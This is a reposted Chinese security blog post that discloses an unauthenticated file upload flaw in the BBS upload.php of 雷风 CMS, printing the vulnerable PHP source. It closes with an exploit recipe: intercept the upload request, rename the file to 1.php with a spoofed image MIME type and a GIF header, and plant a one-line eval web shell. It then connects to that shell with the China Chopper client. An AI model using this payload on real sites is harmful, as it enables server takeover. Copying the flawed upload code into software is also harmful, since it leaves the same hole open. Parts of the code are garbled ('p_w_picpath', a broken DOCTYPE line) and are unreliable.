雷风cms默认是有一个bbs的, bbs根目录下默认是有一个upload.php
源码如下:
01 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "upload/2011/5/201105291829080676.gif) repeat-x;}
14 </style>
15 <body>
16 <?
17 if($_GET["action"]=="load"){
18 $uptypes = array('p_w_picpath/jpg','p_w_picpath/jpeg','p_w_picpath/png','p_w_picpath/pjpeg','p_w_picpath/gif','p_w_picpath/bmp','p_w_picpath/x-png');
19 $url = "http://".$_SERVER["SERVER_NAME"]. $_SERVER["PHP_SELF"];
20 $url = explode("/upload.php",$url);
21 $url = explode("/",$url[0]);
22 $max_file_size = 2*(1024*1024); //上传文件大小限制, 单位BYTE
23
24 $root = "upload_img";
25
26 $folder = date("Y-m",time());
27 $authnum = rand()%100000;
28
29 if ($_SERVER['REQUEST_METHOD'] == 'POST'){
30 if (!is_uploaded_file($_FILES["file"][tmp_name])){
31 exit("<script language=javascript>alert('Please select one file to upload(请选择上传文件)!');history.go(-1);</script>");
32 }
33 $file = $_FILES["file"];
34 if($max_file_size < $file["size"]){//检查文件大小
35 exit("<script language=javascript>alert('Max file size of $max_file_size bytes exceeded(文件大小不能超过2M)!');history.go(-1);</script>");
36 }
37 if(!in_array($file["type"],$uptypes)){//检查文件类型
38 exit("<script language=javascript>alert('Type of the file must be \".jpg/.jpeg/.bmp/.gif/png\"(文件后缀只能是.jpg/.jpeg/.bmp/.gif/png)!');history.go(-1);</script>");
39 }
40 if(!@file_exists($root."/".$folder)) mkdir($root."/".$folder);
41
42 $filename = $file["tmp_name"];
43 $p_w_picpath_size = getp_w_picpathsize($filename);
44 $pinfo = pathinfo($file["name"]);
45 $ftype = $pinfo['extension'];
46 $fileinfo = $root."/".$folder."/".time().$authnum.".".$ftype;
47
48 if (file_exists($fileinfo) && $overwrite != true){
49 exit("<script language=javascript>alert('同名文件已经存在了!');history.go(-1);</script>");
50 }
51 if(!move_uploaded_file ($filename,$fileinfo)){
52 exit("<script language=javascript>alert('移动文件出错!');history.go(-1);</script>");
53 }
54 $pinfo=pathinfo($fileinfo);
55 $fname=$pinfo[basename];
56
57 $root = explode("../",$root);
58 $urlpath = "";
59 for($i=0;$i<count($url)-count($root)+1;$i++){
60 $urlpath .= $url[$i]."/";
61 }
62 $urlpath .= $root[count($root)-1]."/";
63
64 $picture = $urlpath.$folder."/".$fname;
65 $id = trim($_POST["id"]);
66 if(!$id) $id = "picture";
67
68 echo "<script language='javascript'>\r\n";
69 echo "window.parent.document.getElementById('$id').value='$picture';\r\n";
70 echo "window.location.href='upload.php?id=$id';\r\n";
71 echo "</script>\r\n";
72 }
73 exit;
74 }
75 ?>
76 <form action="upload.php?action=load" method="post" enctype="multipart/form-data" name="upform" onSubmit="return checkform();">
77 <input name="file" type="file" class="input" id="iFile" size="18" />
78 <input name="Submit" type="submit" class="iButton" value="上 传" />
79 <input type="hidden" name="id" id="id" value="<?=$_GET["id"]?>">
80 </form>
81 <script language="javascript">
82 function checkform(){
83 if(document.getElementById("file").value == ""){
84 alert("Please select one file to upload(请选择上传文件)!");
85 return false;
86 }
87 }
88 </script>
89 </body>
90 </html>
很明显,无验证 过滤问题。
利用方法:
抓包
改包如下:
Content-Disposition: form-data; name="files"; filename="1.php"
Content-Type: p_w_picpath/jpeg
Gif89a<?
eval ($_GET[SB]);
?>
直接上菜刀就可以了
转自:t00ls
转载于:https://blog.51cto.com/niuzu/577650